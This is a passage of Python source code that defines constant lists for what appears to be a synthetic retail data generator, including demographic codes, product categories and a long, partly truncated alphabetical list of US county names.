NUM_STREET_SUFFIXES = len(STREET_SUFFIX)
YEARS = 1998, 1999, 2000, 2001, 2002
GENDERS = 'M', 'F'
MARITAL_STATUSES = 'D', 'M', 'S', 'U', 'W'
EDUCATION_STATUSES = (
'2 yr Degree',
'4 yr Degree',
'Advanced Degree',
'College',
'Primary',
'Secondary',
'Unknown',
)
CATEGORIES = (
'Books',
'Children',
'Electronics',
'Home',
'Jewelry',
'Men',
'Music',
'Shoes',
'Sports',
'Women',
)
COUNTIES = (
'Abbeville County',
'Acadia Parish',
'Accomack County',
'Ada County',
'Adair County',
'Adams County',
'Addison County',
'Aiken County',
'Aitkin County',
'Alachua County',
'Alamance County',
'Alameda County',
'Alamosa County',
'Albany County',
'Albemarle County',
'Alcona County',
'Alcorn County',
'Aleutians East Borough',
'Aleutians West Census Area',
'Alexander County',
'Alexandria city',
'Alfalfa County',
'Alger County',
'Allamakee County',
'Allegan County',
'Allegany County',
'Alleghany County',
'Allegheny County',
'Allen County',
'Allendale County',
'Allen Parish',
'Alpena County',
'Alpine County',
'Amador County',
'Amelia County',
'Amherst County',
'Amite County',
'Anchorage Borough',
'Anderson County',
'Andrew County',
'Andrews County',
'Androscoggin County',
'Angelina County',
'Anne Arundel County',
'Anoka County',
'Anson County',
'Antelope County',
'Antrim County',
'Apache County',
'Appanoose County',
'Appling County',
'Appomattox County',
'Aransas County',
'Arapahoe County',
'Archer County',
'Archuleta County',
'Arenac County',
'Arkansas County',
'Arlington County',
'Armstrong County',
'Aroostook County',
'Arthur County',
'Ascension Parish',
'Ashe County',
'Ashland County',
'Ashley County',
'Ashtabula County',
'Asotin County',
'Assumption Parish',
'Atascosa County',
'Atchison County',
'Athens County',
'Atkinson County',
'Atlantic County',
'Atoka County',
'Attala County',
'Audrain County',
'Audubon County',
'Auglaize County',
'Augusta County',
'Aurora County',
'Austin County',
'Autauga County',
'Avery County',
'Avoyelles Parish',
'Baca County',
'Bacon County',
'Bailey County',
'Baker County',
'Baldwin County',
'Ballard County',
'Baltimore city',
'Baltimore County',
'Bamberg County',
'Bandera County',
'Banks County',
'Banner County',
'Bannock County',
'Baraga County',
'Barber County',
'Barbour County',
'Barnes County',
'Barnstable County',
'Barnwell County',
'Barren County',
'Barron County',
'Barrow County',
'Barry County',
'Bartholomew County',
'Barton County',
'Bartow County',
'Bastrop County',
'Bates County',
'Bath County',
'Baxter County',
'Bay County',
'Bayfield County',
'Baylor County',
'Beadle County',
'Bear Lake County',
'Beaufort County',
'Beauregard Parish',
'Beaver County',
'Beaverhead County',
'Becker County',
'Beckham County',
'Bedford city',
'Bedford County',
'Bee County',
'Belknap County',
'Bell County',
'Belmont County',
'Beltrami County',
'Benewah County',
'Ben Hill County',
'Bennett County',
'Bennington County',
'Benson County',
'Bent County',
'Benton County',
'Benzie County',
'Bergen County',
'Berkeley County',
'Berks County',
'Berkshire County',
'Bernalillo County',
'Berrien County',
'Bertie County',
'Bethel Census Area',
'Bexar County',
'Bibb County',
'Bienville Parish',
'Big Horn County',
'Big Stone County',
'Billings County',
'Bingham County',
'Blackford County',
'Black Hawk County',
'Bladen County',
'Blaine County',
'Blair County',
'Blanco County',
'Bland County',
'Bleckley County',
'Bledsoe County',
'Blount County',
'Blue Earth County',
'Boise County',
'Bolivar County',
'Bollinger County',
'Bond County',
'Bon Homme County',
'Bonner County',
'Bonneville County',
'Boone County',
'Borden County',
'Bosque County',
'Bossier Parish',
'Botetourt County',
'Bottineau County',
'Boulder County',
'Boundary County',
'Bourbon County',
'Bowie County',
'Bowman County',
'Box Butte County',
'Box Elder County',
'Boyd County',
'Boyle County',
'Bracken County',
'Bradford County',
'Bradley County',
'Branch County',
'Brantley County',
'Braxton County',
'Brazoria County',
'Brazos County',
'Breathitt County',
'Breckinridge County',
'Bremer County',
'Brevard County',
'Brewster County',
'Briscoe County',
'Bristol Bay Borough',
'Bristol city',
'Bristol County',
'Broadwater County',
'Bronx County',
'Brooke County',
'Brookings County',
'Brooks County',
'Broome County',
'Broward County',
'Brown County',
'Brule County',
'Brunswick County',
'Bryan County',
'Buchanan County',
'Buckingham County',
'Bucks County',
'Buena Vista city',
'Buena Vista County',
'Buffalo County',
'Bullitt County',
'Bulloch County',
'Bullock County',
'Buncombe County',
'Bureau County',
'Burke County',
'Burleigh County',
'Burleson County',
'Burlington County',
'Burnet County',
'Burnett County',
'Burt County',
'Butler County',
'Butte County',
'Butts County',
'Cabarrus County',
'Cabell County',
'Cache County',
'Caddo County',
'Caddo Parish',
'Calaveras County',
'Calcasieu Parish',
'Caldwell County',
'Caldwell Parish',
'Caledonia County',
'Calhoun County',
'Callahan County',
'Callaway County',
'Calloway County',
'Calumet County',
'Calvert County',
'Camas County',
'Cambria County',
'Camden County',
'Cameron County',
'Cameron Parish',
'Campbell County',
'Camp County',
'Canadian County',
'Candler County',
'Cannon County',
'Canyon County',
'Cape Girardeau County',
'Cape May County',
'Carbon County',
'Caribou County',
'Carlisle County',
'Carlton County',
'Caroline County',
'Carroll County',
'Carson City',
'Carson County',
'Carter County',
'Carteret County',
'Carver County',
'Cascade County',
'Casey County',
'Cass County',
'Cassia County',
'Castro County',
'Caswell County',
'Catahoula Parish',
'Catawba County',
'Catoosa County',
'Catron County',
'Cattaraugus County',
'Cavalier County',
'Cayuga County',
'Cecil County',
'Cedar County',
'Centre County',
'Cerro Gordo County',
'Chaffee County',
'Chambers County',
'Champaign County',
'Chariton County',
'Charle',
'Charles City County',
'Charles County',
'Charles Mix County',
'Charleston County',
'Charlevoix County',
'Charlotte County',
'Charlottesville city',
'Charlton County',
'Chase County',
'Chatham County',
'Chattahoochee County',
'Chattooga County',
'Chautauqua County',
'Chaves County',
'Cheatham County',
'Cheboygan County',
'Chelan County',
'Chemung County',
'Chenango County',
'Cherokee County',
'Cherry County',
'Chesapeake city',
'Cheshire County',
'Chester County',
'Chesterfield County',
'Cheyenne County',
'Chickasaw County',
'Chicot County',
'Childress County',
'Chilton County',
'Chippewa County',
'Chisago County',
'Chittenden County',
'Choctaw County',
'Chouteau County',
'Chowan County',
'Christian County',
'Churchill County',
'Cibola County',
'Cimarron County',
'Citrus County',
'Clackamas County',
'Claiborne County',
'Claiborne Parish',
'Clallam County',
'Clare County',
'Clarendon County',
'Clarion County',
'Clark County',
'Clarke County',
'Clatsop County',
'Clay County',
'Clayton County',
'Clear Creek County',
'Clearfield County',
'Clearwater County',
'Cleburne County',
'Clermont County',
'Cleveland County',
'Clifton Forge city',
'Clinch County',
'Clinton County',
'Cloud County',
'Coahoma County',
'Coal County',
'Cobb County',
'Cochise County',
'Cochran County',
'Cocke County',
'Coconino County',
'Codington County',
'Coffee County',
'Coffey County',
'Coke County',
'Colbert County',
'Cole County',
'Coleman County',
'Coles County',
'Colfax County',
'Colleton County',
'Collier County',
'Collin County',
'Collingsworth County',
'Colonial Heights city',
'Colorado County',
'Colquitt County',
'Columbia County',
'Columbiana County',
'Columbus County',
'Colusa County',
'Comal County',
'Comanche County',
'Concho County',
'Concordia Parish',
'Conecuh County',
'Conejos County',
'Contra Costa County',
'Converse County',
'Conway County',
'Cook County',
'Cooke County',
'Cooper County',
'Coosa County',
'Coos County',
'Copiah County',
'Corson County',
'Cortland County',
'Coryell County',
'Coshocton County',
'Costilla County',
'Cottle County',
'Cotton County',
'Cottonwood County',
'Covington city',
'Covington County',
'Coweta County',
'Cowley County',
'Cowlitz County',
'Craig County',
'Craighead County',
'Crane County',
'Craven County',
'Crawford County',
'Creek County',
'Crenshaw County',
'Crisp County',
'Crittenden County',
'Crockett County',
'Crook County',
'Crosby County',
'Cross County',
'Crowley County',
'Crow Wing County',
'Culberson County',
'Cullman County',
'Culpeper County',
'Cumberland County',
'Cuming County',
'Currituck County',
'Curry County',
'Custer County',
'Cuyahoga County',
'Dade County',
'Daggett County',
'Dakota County',
'Dale County',
'Dallam County',
'Dallas County',
'Dane County',
'Daniels County',
'Danville city',
'Dare County',
'Darke County',
'Darlington County',
'Dauphin County',
'Davidson County',
'Davie County',
'Daviess County',
'Davis County',
'Davison County',
'Dawes County',
'Dawson County',
'Day County',
'Deaf Smith County',
'Dearborn County',
'DeBaca County',
'Decatur County',
'Deer Lodge County',
'Defiance County',
'De Kalb County',
'DeKalb County',
'Delaware County',
'Del Norte County',
'Delta County',
'Denali Borough',
'Dent County',
'Denton County',
'Denver County',
'Deschutes County',
'Desha County',
'Des Moines County',
'DeSoto County',
'De Soto Parish',
'Deuel County',
'Dewey County',
'De Witt County',
'DeWitt County',
'Dickens County',
'Dickenson County',
'Dickey County',
'Dickinson County',
'Dickson County',
'Dillingham Census Area',
'Dillon County',
'Dimmit County',
'Dinwiddie County',
'District of Columbia',
'Divide County',
'Dixie County',
'Dixon County',
'Doddridge County',
'Dodge County',
'Dolores County',
'Dona Ana County',
'Doniphan County',
'Donley County',
'Dooly County',
'Door County',
'Dorchester County',
'Dougherty County',
'Douglas County',
'Drew County',
'Dubois County',
'Dubuque County',
'Duchesne County',
'Dukes County',
'Dundy County',
'Dunklin County',
'Dunn County',
'DuPage County',
'Duplin County',
'Durham County',
'Dutchess County',
'Duval County',
'Dyer County',
'Eagle County',
'Early County',
'East Baton Rouge Parish',
'East Carroll Parish',
'East Feliciana Parish',
'Eastland County',
'Eaton County',
'Eau Claire County',
'Echols County',
'Ector County',
'Eddy County',
'Edgar County',
'Edgecombe County',
'Edgefield County',
'Edmonson County',
'Edmunds County',
'Edwards County',
'Effingham County',
'Elbert County',
'El Dorado County',
'Elk County',
'Elkhart County',
'Elko County',
'Elliott County',
'Ellis County',
'Ellsworth County',
'Elmore County',
'El Paso County',
'Emanuel County',
'Emery County',
'Emmet County',
'Emmons County',
'Emporia city',
'Erath County',
'Erie County',
'Escambia County',
'Esmeralda County',
'Essex County',
'Estill County',
'Etowah County',
'Eureka County',
'Evangeline Parish',
'Evans County',
'Fairbanks North Star Borough',
'Fairfax city',
'Fairfax County',
'Fairfield County',
'Fallon County',
'Fall River County',
'Falls Church city',
'Falls County',
'Fannin County',
'Faribault County',
'Faulk County',
'Faulkner County',
'Fauquier County',
'Fayette County',
'Fentress County',
'Fergus County',
'Ferry County',
'Fillmore County',
'Finney County',
'Fisher County',
'Flagler County',
'Flathead County',
'Fleming County',
'Florence County',
'Floyd County',
'Fluvanna County',
'Foard County',
'Fond du Lac County',
'Ford County',
'Forest County',
'Forrest County',
'Forsyth County',
'Fort Bend County',
'Foster County',
'Fountain County',
'Franklin city',
'Franklin County',
'Franklin Parish',
'Frederick County',
'Fredericksburg city',
'Freeborn County',
'Freestone County',
'Fremont County',
'Fresno County',
'Frio County',
'Frontier County',
'Fulton County',
'Furnas County',
'Gadsden County',
'Gage County',
'Gaines County',
'Galax city',
'Gallatin County',
'Gallia County',
'Galveston County',
'Garden County',
'Garfield County',
'Garland County',
'Garrard County',
'Garrett County',
'Garvin County',
'Garza County',
'Gasconade County',
'Gaston County',
'Gates County',
'Geary County',
'Geauga County',
'Gem County',
'Genesee County',
'Geneva County',
'Gentry County',
'George County',
'Georgetown County',
'Gibson County',
'Gila County',
'Gilchrist County',
'Giles County',
'Gillespie County',
'Gilliam County',
'Gilmer County',
'Gilpin County',
'Glacier County',
'Glades County',
'Gladwin County',
'Glascock County',
'Glasscock County',
'Glenn County',
'Gloucester County',
'Glynn County',
'Gogebic County',
'Golden Valley County',
'Goliad County',
'Gonzales County',
'Goochland County',
'Goodhue County',
'Gooding County',
'Gordon County',
'Goshen County',
'Gosper County',
'Gove County',
'Grady County',
'Grafton County',
'Graham County',
'Grainger County',
'Grand County',
'Grand Forks County',
'Grand Isle County',
'Grand Traverse County',
'Granite County',
'Grant County',
'Grant Parish',
'Granville County',
'Gratiot County',
'Graves County',
'Gray County',
'Grays Harbor County',
'Grayson County',
'Greeley County',
'Greenbrier County',
'Green County',
'Greene County',
'Green Lake County',
'Greenlee County',
'Greensville County',
'Greenup County',
'Greenville County',
'Greenwood County',
'Greer County',
'Gregg County',
'Gregory County',
'Grenada County',
'Griggs County',
'Grimes County',
'Grundy County',
'Guadalupe County',
'Guernsey County',
'Guilford County',
'Gulf County',
'Gunnison County',
'Guthrie County',
'Gwinnett County',
'Haakon County',
'Habersham County',
'Haines Borough',
'Hale County',
'Halifax County',
'Hall County',
'Hamblen County',
'Hamilton County',
'Hamlin County',
'Hampden County',
'Hampshire County',
'Hampton city',
'Hampton County',
'Hancock County',
'Hand County',
'Hanover County',
'Hansford County',
'Hanson County',
'Haralson County',
'Hardee County',
'Hardeman County',
'Hardin County',
'Harding County',
'Hardy County',
'Harford County',
'Harlan County',
'Harmon County',
'Harnett County',
'Harney County',
'Harper County',
'Harris County',
'Harrisonburg city',
'Harrison County',
'Hart County',
'Hartford County',
'Hartley County',
'Harvey County',
'Haskell County',
'Hawaii County',
'Hawkins County',
'Hayes County',
'Hays County',
'Haywood County',
'Heard County',
'Hemphill County',
'Hempstead County',
'Henderson County',
'Hendricks County',
'Hendry County',
'Hennepin County',
'Henrico County',
'Henry County',
'Herkimer County',
'Hernando County',
'Hertford County',
'Hettinger County',
'Hickman County',
'Hickory County',
'Hidalgo County',
'Highland County',
'Highlands County',
'Hill County',
'Hillsborough County',
'Hillsdale County',
'Hinds County',
'Hinsdale County',
'Hitchcock County',
'Hocking County',
'Hockley County',
'Hodgeman County',
'Hoke County',
'Holmes County',
'Holt County',
'Honolulu County',
'Hood County',
'Hood River County',
'Hooker County',
'Hopewell city',
'Hopkins County',
'Horry County',
'Hot Spring County',
'Hot Springs County',
'Houghton County',
'Houston County',
'Howard County',
'Howell County',
'Hubbard County',
'Hudson County',
'Hudspeth County',
'Huerfano County',
'Hughes County',
'Humboldt County',
'Humphreys County',
'Hunt County',
'Hunterdon County',
'Huntingdon County',
'Huntington County',
'Huron County',
'Hutchinson County',
'Hyde County',
'Iberia Parish',
'Iberville Parish',
'Ida County',
'Idaho County',
'Imperial County',
'Independence County',
'Indiana County',
'Indian River County',
'Ingham County',
'Inyo County',
'Ionia County',
'Iosco County',
'Iowa County',
'Iredell County',
'Irion County',
'Iron County',
'Iroquois County',
'Irwin County',
'Isabella County',
'Isanti County',
'Island County',
'Isle of Wight County',
'Issaquena County',
'Itasca County',
'Itawamba County',
'Izard County',
'Jack County',
'Jackson County',
'<NAME>',
'James City County',
'Jasper County',
'Jay County',
'<NAME> County',
'Jefferson County',
'<NAME> County',
'<NAME>',
'<NAME>ish',
'Jenkins County',
'Jennings County',
'Jerauld County',
'Jerome County',
'Jersey County',
'Jessamine County',
'Jewell County',
'<NAME> County',
'<NAME> County',
'<NAME> County',
'Johnson County',
'Johnston County',
'Jones County',
'Josephine County',
'Juab County',
'Judith Basin County',
'Juneau Borough',
'Juneau County',
'Juniata County',
'Kalamazoo County',
'Kalkaska County',
'Kanabec County',
'Kanawha County',
'Kandiyohi County',
'Kane County',
'Kankakee County',
'Karnes County',
'Kauai County',
'Kaufman County',
'Kay County',
'Kearney County',
'Kearny County',
'Keith County',
'Kemper County',
'Kenai Peninsula Borough',
'Kendall County',
'Kenedy County',
'Kennebec County',
'Kenosha County',
'Kent County',
'Kenton County',
'Keokuk County',
'Kern County',
'Kerr County',
'Kershaw County',
'Ketchikan Gateway Borough',
'Kewaunee County',
'Keweenaw County',
'Keya Paha County',
'Kidder County',
'Kimball County',
'Kimble County',
'King and Queen County',
'King County',
'Kingfisher County',
'King George County',
'Kingman County',
'Kingsbury County',
'Kings County',
'King William County',
'Kinney County',
'Kiowa County',
'Kit Carson County',
'Kitsap County',
'Kittitas County',
'Kittson County',
'Klamath County',
'Kleberg County',
'Klickitat County',
'Knott County',
'Knox County',
'Kodiak Island Borough',
'Koochiching County',
'Kootenai County',
'Kosciusko County',
'Kossuth County',
'Labette County',
'Lackawanna County',
'Laclede County',
'Lac qui Parle County',
'La Crosse County',
'Lafayette County',
'Lafayette Parish',
'Lafourche Parish',
'Lagrange County',
'Lake and Peninsula Borough',
'Lake County',
'Lake of the Woods County',
'Lamar County',
'Lamb County',
'Lamoille County',
'LaMoure County',
'Lampasas County',
'Lancaster County',
'Lander County',
'Lane County',
'Langlade County',
'Lanier County',
'La Paz County',
'Lapeer County',
'La Plata County',
'La Porte County',
'Laramie County',
'Larimer County',
'Larue County',
'La Salle County',
'La Salle Parish',
'Las Animas County',
'Lassen County',
'Latah County',
'Latimer County',
'Lauderdale County',
'Laurel County',
'Laurens County',
'Lavaca County',
'Lawrence County',
'Lea County',
'Leake County',
'Leavenworth County',
'Lebanon County',
'Lee County',
'Leelanau County',
'Leflore County',
'Le Flore County',
'Lehigh County',
'Lemhi County',
'Lenawee County',
'Lenoir County',
'Leon County',
'Leslie County',
'Le Sueur County',
'Letcher County',
'Levy County',
'Lewis and Clark County',
'Lewis County',
'Lexington city',
'Lexington County',
'Liberty County',
'Licking County',
'Limestone County',
'Lincoln County',
'Lincoln Parish',
'Linn County',
'Lipscomb County',
'Litchfield County',
'Little River County',
'Live Oak County',
'Livingston County',
'Livingston Parish',
'Llano County',
'Logan County',
'Long County',
'Lonoke County',
'Lorain County',
'Los Alamos County',
'Los Angeles County',
'Loudon County',
'Loudoun County',
'Louisa County',
'Loup County',
'Love County',
'Loving County',
'Lowndes County',
'Lubbock County',
'Lucas County',
'Luce County',
'Lumpkin County',
'Luna County',
'Lunenburg County',
'Luzerne County',
'Lycoming County',
'Lyman County',
'Lynchburg city',
'Lynn County',
'Lyon County',
'Mackinac County',
'Macomb County',
'Macon County',
'Macoupin County',
'Madera County',
'Madison County',
'Madison Parish',
'Magoffin County',
'Mahaska County',
'Mahnomen County',
'Mahoning County',
'Major County',
'Malheur County',
'Manassas city',
'Manassas Park city',
'Manatee County',
'Manistee County',
'Manitowoc County',
'Marathon County',
'Marengo County',
'Maricopa County',
'Maries County',
'Marin County',
'Marinette County',
'Marion County',
'Mariposa County',
'Marlboro County',
'Marquette County',
'Marshall County',
'Martin County',
'Martinsville city',
'Mason County',
'Massac County',
'Matagorda County',
'Matanuska-Susitna Borough',
'Mathews County',
'Maui County',
'Maury County',
'Maverick County',
'Mayes County',
'McClain County',
'McCone County',
'McCook County',
'McCormick County',
'McCracken County',
'McCreary County',
'McCulloch County',
'McCurtain County',
'McDonald County',
'McDonough County',
'McDowell County',
'McDuffie County',
'McHenry County',
'McIntosh County',
'McKean County',
'McKenzie County',
'McKinley County',
'McLean County',
'McLennan County',
'McLeod County',
'McMinn County',
'McMullen County',
'McNairy County',
'McPherson County',
'Meade County',
'Meagher County',
'Mecklenburg County',
'Mecosta County',
'Medina County',
'Meeker County',
'Meigs County',
'Mellette County',
'Menard County',
'Mendocino County',
'Menifee County',
'Menominee County',
'Merced County',
'Mercer County',
'Meriwether County',
'Merrick County',
'Merrimack County',
'Mesa County',
'Metcalfe County',
'Miami County',
'Middlesex County',
'Midland County',
'Mifflin County',
'Milam County',
'Millard County',
'Mille Lacs County',
'Miller County',
'Mills County',
'Milwaukee County',
'Mineral County',
'Miner County',
'Mingo County',
'Minidoka County',
'Minnehaha County',
'Missaukee County',
'Mississippi County',
'Missoula County',
'Mitchell County',
'Mobile County',
'Modoc County',
'Moffat County',
'Mohave County',
'Moniteau County',
'Monmouth County',
'Mono County',
'Monona County',
'Monongalia County',
'Monroe County',
'Montague County',
'Montcalm County',
'Monterey County',
'Montezuma County',
'Montgomery County',
'Montmorency County',
'Montour County',
'Montrose County',
'Moody County',
'Moore County',
'Mora County',
'Morehouse Parish',
'Morgan County',
'Morrill County',
'Morris County',
'Morrison County',
'Morrow County',
'Morton County',
'Motley County',
'Moultrie County',
'Mountrail County',
'Mower County',
'Muhlenberg County',
'Multnomah County',
'Murray County',
'Muscatine County',
'Muscogee County',
'Muskegon County',
'Muskingum County',
'Muskogee County',
'Musselshell County',
'Nacogdoches County',
'Nance County',
'Nantucket County',
'Napa County',
'Nash County',
'Nassau County',
'Natchitoches Parish',
'Natrona County',
'Navajo County',
'Navarro County',
'Nelson County',
'Nemaha County',
'Neosho County',
'Neshoba County',
'Ness County',
'Nevada County',
'Newaygo County',
'Newberry County',
'New Castle County',
'New Hanover County',
'New Haven County',
'New Kent County',
'New London County',
'New Madrid County',
'Newport County',
'Newport News city',
'Newton County',
'New York County',
'Nez Perce County',
'Niagara County',
'Nicholas County',
'Nicollet County',
'Niobrara County',
'Noble County',
'Nobles County',
'Nodaway County',
'Nolan County',
'Nome Census Area',
'Norfolk city',
'Norfolk County',
'Norman County',
'Northampton County',
'North Slope Borough',
'Northumberland County',
'Northwest Arctic Borough',
'Norton city',
'Norton County',
'Nottoway County',
'Nowata County',
'Noxubee County',
'Nuckolls County',
'Nueces County',
'Nye County',
'Oakland County',
'Obion County',
'O-Brien County',
'Oceana County',
'Ocean County',
'Ochiltree County',
'Oconee County',
'Oconto County',
'Ogemaw County',
'Ogle County',
'Oglethorpe County',
'Ohio County',
'Okaloosa County',
'Okanogan County',
'Okeechobee County',
'Okfuskee County',
'Oklahoma County',
'Okmulgee County',
'Oktibbeha County',
'Oldham County',
'Oliver County',
'Olmsted County',
'Oneida County',
'Onondaga County',
'Onslow County',
'Ontario County',
'Ontonagon County',
'Orangeburg County',
'Orange County',
'Oregon County',
'Orleans County',
'Orleans Parish',
'Osage County',
'Osborne County',
'Osceola County',
'Oscoda County',
'Oswego County',
'Otero County',
'Otoe County',
'Otsego County',
'Ottawa County',
'Otter Tail County',
'Ouachita County',
'Ouachita Parish',
'Ouray County',
'Outagamie County',
'Overton County',
'Owen County',
'Owsley County',
'Owyhee County',
'Oxford County',
'Ozark County',
'Ozaukee County',
'Pacific County',
'Page County',
'Palm Beach County',
'Palo Alto County',
'Palo Pinto County',
'Pamlico County',
'Panola County',
'Park County',
'Parke County',
'Parker County',
'Parmer County',
'Pasco County',
'Pasquotank County',
'Passaic County',
'Patrick County',
'Paulding County',
'Pawnee County',
'Payette County',
'Payne County',
'Peach County',
'Pearl River County',
'Pecos County',
'Pembina County',
'Pemiscot County',
'Pender County',
'Pendleton County',
'Pend Oreille County',
'Pennington County',
'Penobscot County',
'Peoria County',
'Pepin County',
'Perkins County',
'Perquimans County',
'Perry County',
'Pershing County',
'Person County',
'Petersburg city',
'Petroleum County',
'Pettis County',
'Phelps County',
'Philadelphia County',
'Phillips County',
'Piatt County',
'Pickaway County',
'Pickens County',
'Pickett County',
'Pierce County',
'Pike County',
'Pima County',
'Pinal County',
'Pine County',
'Pinellas County',
'Pipestone County',
'Piscataquis County',
'Pitkin County',
'Pitt County',
'Pittsburg County',
'Pittsylvania County',
'Piute County',
'Placer County',
'Plaquemines Parish',
'Platte County',
'Pleasants County',
'Plumas County',
'Plymouth County',
'Pocahontas County',
'Poinsett County',
'Pointe Coupee Parish',
'Polk County',
'Pondera County',
'Pontotoc County',
'Pope County',
'Poquoson city',
'Portage County',
'Porter County',
'Portsmouth city',
'Posey County',
'Pottawatomie County',
'Pottawattamie County',
'Potter County',
'Powder River County',
'Powell County',
'Power County',
'Poweshiek County',
'Powhatan County',
'Prairie County',
'Pratt County',
'Preble County',
'Prentiss County',
'Presidio County',
'Presque Isle County',
'Preston County',
'Price County',
'Prince Edward County',
'Prince George County',
'Prince William County',
'Providence County',
'Prowers County',
'Pueblo County',
'Pulaski County',
'Pushmataha County',
'Putnam County',
'Quay County',
'Queen Anne County',
'Queens County',
'Quitman County',
'Rabun County',
'Racine County',
'Radford city',
'Rains County',
'Raleigh County',
'Ralls County',
'Ramsey County',
'Randall County',
'Randolph County',
'Rankin County',
'Ransom County',
'Rapides Parish',
'Rappahannock County',
'Ravalli County',
'Rawlins County',
'Ray County',
'Reagan County',
'Real County',
'Red Lake County',
'Red River County',
'Red River Parish',
'Red Willow County',
'Redwood County',
'Reeves County',
'Refugio County',
'Reno County',
'Rensselaer County',
'Renville County',
'Republic County',
'Reynolds County',
'Rhea County',
'Rice County',
'Richardson County',
'Rich County',
'Richland County',
'Richland Parish',
'Richmond city',
'Richmond County',
'Riley County',
'Ringgold County',
'Rio Arriba County',
'Rio Blanco County',
'Rio Grande County',
'Ripley County',
'Ritchie County',
'Riverside County',
'Roane County',
'Roanoke city',
'Roanoke County',
'Roberts County',
'Robertson County',
'Robeson County',
'Rockbridge County',
'Rockcastle County',
'Rock County',
'Rockdale County',
'Rockingham County',
'Rock Island County',
'Rockland County',
'Rockwall County',
'Roger Mills County',
'Rogers County',
'Rolette County',
'Rooks County',
'Roosevelt County',
'Roscommon County',
'Roseau County',
'Rosebud County',
'Ross County',
'Routt County',
'Rowan County',
'Runnels County',
'Rush County',
'Rusk County',
'Russell County',
'Rutherford County',
'Rutland County',
'Sabine County',
'Sabine Parish',
'Sac County',
'Sacramento County',
'Sagadahoc County',
'Saginaw County',
'Saguache County',
'Salem city',
'Salem County',
'Saline County',
'Salt Lake County',
'Saluda County',
'Sampson County',
'San Augustine County',
'San Benito County',
'San Bernardino County',
'Sanborn County',
'Sanders County',
'San Diego County',
'Sandoval County',
'Sandusky County',
'San Francisco County',
'Sangamon County',
'Sanilac County',
'San Jacinto County',
'San Joaquin County',
'San Juan County',
'San Luis Obispo County',
'San Mateo County',
'San Miguel County',
'San Patricio County',
'Sanpete County',
'San Saba County',
'Santa Barbara County',
'Santa Clara County',
'Santa Cruz County',
'Santa Fe County',
'Santa Rosa County',
'Sarasota County',
'Saratoga County',
'Sargent County',
'Sarpy County',
'Sauk County',
'Saunders County',
'Sawyer County',
'Schenectady County',
'Schleicher County',
'Schley County',
'Schoharie County',
'Schoolcraft County',
'Schuyler County',
'Schuylkill County',
'Scioto County',
'Scotland County',
'Scott County',
'Scotts Bluff County',
'Screven County',
'Scurry County',
'Searcy County',
'Sebastian County',
'Sedgwick County',
'Seminole County',
'Seneca County',
'Sequatchie County',
'Sequoyah County',
'Sevier County',
'Seward County',
'Shackelford County',
'Shannon County',
'Sharkey County',
'Sharp County',
'Shasta County',
'Shawano County',
'Shawnee County',
'Sheboygan County',
'Shelby County',
'Shenandoah County',
'Sherburne County',
'Sheridan County',
'Sherman County',
'Shiawassee County',
'Shoshone County',
'Sibley County',
'Sierra County',
'Silver Bow County',
'Simpson County',
'Sioux County',
'Siskiyou County',
'Sitka Borough',
'Skagit County',
'Skamania County',
'Slope County',
'Smith County',
'Smyth County',
'Snohomish County',
'Snyder County',
'Socorro County',
'Solano County',
'Somerset County',
'Somervell County',
'Sonoma County',
'Southampton County',
'Spalding County',
'Spartanburg County',
'Spencer County',
'Spink County',
'Spokane County',
'Spotsylvania County',
'Stafford County',
'Stanislaus County',
'Stanley County',
'Stanly County',
'Stanton County',
'Stark County',
'Starke County',
'Starr County',
'Staunton city',
'Stearns County',
'Steele County',
'Stephens County',
'Stephenson County',
'Sterling County',
'Steuben County',
'Stevens County',
'Stewart County',
'Stillwater County',
'Stoddard County',
'Stokes County',
'Stone County',
'Stonewall County',
'Storey County',
'Story County',
'Strafford County',
'Stutsman County',
'Sublette County',
'Suffolk city',
'Suffolk County',
'Sullivan County',
'Sully County',
'Summers County',
'Summit County',
'Sumner County',
'Sumter County',
'Sunflower County',
'Surry County',
'Susquehanna County',
'Sussex County',
'Sutter County',
'Sutton County',
'Suwannee County',
'Swain County',
'Sweet Grass County',
'Sweetwater County',
'Swift County',
'Swisher County',
'Switzerland County',
'Talbot County',
'Taliaferro County',
'Talladega County',
'Tallahatchie County',
'Tallapoosa County',
'Tama County',
'Taney County',
'Tangipahoa Parish',
'Taos County',
'Tarrant County',
'Tate County',
'Tattnall County',
'Taylor County',
'Tazewell County',
'Tehama County',
'Telfair County',
'Teller County',
'Tensas Parish',
'Terrebonne Parish',
'Terrell County',
'Terry County',
'Teton County',
'Texas County',
'Thayer County',
'Thomas County',
'Throckmorton County',
'Thurston County',
'Tift County',
'Tillamook County',
'Tillman County',
'Tioga County',
'Tippah County',
'Tippecanoe County',
'Tipton County',
'Tishomingo County',
'Titus County',
'Todd County',
'Tolland County',
'Tom Green County',
'Tompkins County',
'Tooele County',
'Toole County',
'Toombs County',
'Torrance County',
'Towner County',
'Towns County',
'Traill County',
'Transylvania County',
'Traverse County',
'Travis County',
'Treasure County',
'Trego County',
'Trempealeau County',
'Treutlen County',
'Trigg County',
'Trimble County',
'Trinity County',
'Tripp County',
'Troup County',
'Trousdale County',
'Trumbull County',
'Tucker County',
'Tulare County',
'Tulsa County',
'Tunica County',
'Tuolumne County',
'Turner County',
'Tuscaloosa County',
'Tuscarawas County',
'Tuscola County',
'Twiggs County',
'Twin Falls County',
'Tyler County',
'Tyrrell County',
'Uinta County',
'Uintah County',
'Ulster County',
'Umatilla County',
'Unicoi County',
'Union County',
'Union Parish',
'Upshur County',
'Upson County',
'Upton County',
'Utah County',
'Uvalde County',
'Valdez-Cordova Census Area',
'Valencia County',
'Valley County',
'Val Verde County',
'Van Buren County',
'Vance County',
'Vanderburgh County',
'Van Wert County',
'Van Zandt County',
'Venango County',
'Ventura County',
'Vermilion County',
'Vermilion Parish',
'Vermillion County',
'Vernon County',
'Vernon Parish',
'Victoria County',
'Vigo County',
'Vilas County',
'Vinton County',
'Virginia Beach city',
'Volusia County',
'Wabasha County',
'Wabash County',
'Wabaunsee County',
'Wade Hampton Census Area',
'Wadena County',
'Wagoner County',
'Wahkiakum County',
'Wake County',
'Wakulla County',
'Waldo County',
'Walker County',
'Wallace County',
'Walla Walla County',
'Waller County',
'Wallowa County',
'Walsh County',
'Walthall County',
'Walton County',
'Walworth County',
'Wapello County',
'Ward County',
'Ware County',
'Warren County',
'Warrick County',
'Wasatch County',
'Wasco County',
'Waseca County',
'Washakie County',
'Washburn County',
'Washington County',
'Washington Parish',
'Washita County',
'Washoe County',
'Washtenaw County',
'Watauga County',
'Watonwan County',
'Waukesha County',
'Waupaca County',
'Waushara County',
'Wayne County',
'Waynesboro city',
'Weakley County',
'Webb County',
'Weber County',
